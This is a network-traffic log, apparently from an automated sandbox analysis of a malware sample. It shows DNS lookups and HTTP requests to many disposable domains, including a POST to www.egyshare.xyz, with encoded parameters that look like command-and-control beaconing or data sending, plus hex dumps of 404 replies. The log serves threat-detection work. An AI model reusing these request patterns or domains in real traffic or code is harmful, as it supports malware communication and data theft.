Source: global traffic | HTTP traffic detected: GET /g4fs/?0PIXBf9=3ndIaHiqeNA3nHGd8AHkXwlYF1OgixBFyjUlI87s5QAdbYlY5Sf7asAsxRx6tHqc14Nk2leX0TZcqtK/n28nLOTw2Vfuiiw8TGap3DrxCRua9Dp2yMpF4VwKHEspiCTWJ2CwkW3F1CDu&tD_=f00xUVKh HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeHost: www.cssa.auctionUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Source: global traffic | HTTP traffic detected: GET /aqil/?tD_=f00xUVKh&0PIXBf9=+VwoEzPaDs0s7aELp9mEitaybqlo9Ma6vB91+jO83mkKcBs1X1DQL/6P3P2ZQT9OHqbgLgcpvVmqnE/hn02MtVwUieIUVcwPPIBQaGnRdw6ZzI3y7/51wpZ1zsNtMrZa/5ef5+yRkwqf HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeHost: www.acc888ommodate.xyzUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Source: global traffic | HTTP traffic detected: GET /zffa/?0PIXBf9=Lr0UKEZNgDTJN6gT+Us371Y8hMyDvaQkpz1n9V5B19O6mDyNa8d38Q+pA9qLUvQ8A8Z/r2CCV5OH4hlRsxt9M39/KtueIxj6h2UJ95Aou8NDO7hK3C23zz+4LvY5JlduZs+ECZ1LIizb&tD_=f00xUVKh HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeHost: www.070002018.xyzUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Source: global traffic | HTTP traffic detected: GET /chrv/?tD_=f00xUVKh&0PIXBf9=oqIvPuLKU6ipUF0l0s9jGwC5Rs+ISH+IiXTOUljk/btMUGhxXUhy/ROn8iRvBZThJHrBfDF95d/bLV86djItjxOaoccx9TISaPCf4hbQm/G+Yq+LkHY0VTYNMEk+ymSz3ZEiRr7ur/of HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeHost: www.startvin.topUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Source: global traffic | HTTP traffic detected: GET /55tt/?0PIXBf9=Ogm+Zpk+8l6HQ6PINDlmGUkcF8k7x5YOd8W05nhCgxhbbgxSQo8C646ORpAxt2ba51M1bpBVlaSpASxEjtHc742t+MiRm52SMn9uh/BsfFsC8+xAemM0t+vEaw1VEDnH1Ike7P0+r0HF&tD_=f00xUVKh HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeHost: www.mdpc7.topUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Source: global traffic | DNS traffic detected: DNS query: 15.164.165.52.in-addr.arpa
Source: global traffic | DNS traffic detected: DNS query: www.uynline.shop
Source: global traffic | DNS traffic detected: DNS query: www.ytsd88.top
Source: global traffic | DNS traffic detected: DNS query: www.egyshare.xyz
Source: global traffic | DNS traffic detected: DNS query: www.bionanosolutions.info
Source: global traffic | DNS traffic detected: DNS query: www.tals.xyz
Source: global traffic | DNS traffic detected: DNS query: www.cssa.auction
Source: global traffic | DNS traffic detected: DNS query: www.acc888ommodate.xyz
Source: global traffic | DNS traffic detected: DNS query: www.070002018.xyz
Source: global traffic | DNS traffic detected: DNS query: www.startvin.top
Source: global traffic | DNS traffic detected: DNS query: www.mdpc7.top
Source: global traffic | DNS traffic detected: DNS query: www.phoenix88.sbs
Source: unknown | HTTP traffic detected: POST /lu7u/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.5Cache-Control: no-cacheContent-Length: 220Connection: closeContent-Type: application/x-www-form-urlencodedHost: www.egyshare.xyzOrigin: http://www.egyshare.xyzReferer: http://www.egyshare.xyz/lu7u/User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 Data Raw: 30 50 49 58 42 66 39 3d 2f 62 37 47 67 69 4f 63 6b 36 53 4b 38 44 42 71 56 76 50 36 70 79 5a 48 67 53 46 61 51 78 6a 48 79 64 37 78 70 47 50 68 4a 7a 52 51 36 67 31 79 52 4a 4b 62 50 76 50 62 4d 64 33 44 38 4f 66 68 4d 62 36 2b 4d 42 66 47 31 51 4a 69 6a 43 4d 33 7a 67 38 48 55 48 6a 37 63 48 45 78 49 7a 45 6d 79 45 34 77 74 71 55 47 57 50 47 38 67 4a 57 31 4f 5a 43 2f 66 77 50 35 49 4f 67 5a 56 70 62 4a 58 47 77 4f 31 45 59 2f 51 7a 4c 6e 77 62 7a 58 6f 34 57 4f 77 4b 70 54 71 72 48 4f 57 39 63 72 72 33 37 73 65 37 45 2b 6f 6a 75 4a 30 6c 4d 39 70 33 49 46 4c 4e 61 35 70 61 6e 56 4a 50 57 35 35 75 41 6f 76 35 4b 55 69 79 6f 56 4f 54 4c 78 38 77 3d 3d Data Ascii: 0PIXBf9=/b7GgiOck6SK8DBqVvP6pyZHgSFaQxjHyd7xpGPhJzRQ6g1yRJKbPvPbMd3D8OfhMb6+MBfG1QJijCM3zg8HUHj7cHExIzEmyE4wtqUGWPG8gJW1OZC/fwP5IOgZVpbJXGwO1EY/QzLnwbzXo4WOwKpTqrHOW9crr37se7E+ojuJ0lM9p3IFLNa5panVJPW55uAov5KUiyoVOTLx8w==
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 18 Nov 2024 12:12:53 GMTContent-Type: text/htmlContent-Length: 409Connection: closeETag: "66d016cf-199" Data Raw: 3c 68 74 6d 6c 3e 0a 3c 73 74 79 6c 65 3e 0a 09 2e 62 74 6c 69 6e 6b 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 32 30 61 35 33 61 3b 0a 09 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 35 70 78 22 20 3e 50 6f 77 65 72 20 62 79 20 3c 61 20 63 6c 61 73 73 3d 22 62 74 6c 69 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 74 2e 63 6e 2f 3f 66 72 6f 6d 3d 34 30 34 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e e5 a0 a1 e5 a1 94 20 28 e5 85 8d e8 b4 b9 ef bc 8c e9 ab 98 e6 95 88 e5 92 8c e5 ae 89 e5 85 a8 e7 9a 84 e6 89 98 e7 ae a1 e6 8e a7 e5 88 b6 e9 9d a2 e6 9d bf 29 3c 2f 61 3e 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><style>.btlink {color: #20a53a;text-decoration: none;}</style><meta charset="UTF-8"><html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><div style="text-align: center;font-size: 15px" >Power by <a class="btlink" href="https://www.bt.cn/?from=404" target="_blank"> ()</a></div></body></html>
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 18 Nov 2024 12:13:51 GMTserver: LiteSpeed Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 18 Nov 2024 12:13:53 GMTserver: LiteSpeed Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 18 Nov 2024 12:13:56 GMTserver: LiteSpeed Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 18 Nov 2024 12:13:58 GMTserver: LiteSpeed Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 18 Nov 2024 12:14:04 GMTContent-Type: text/htmlContent-Length: 548Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 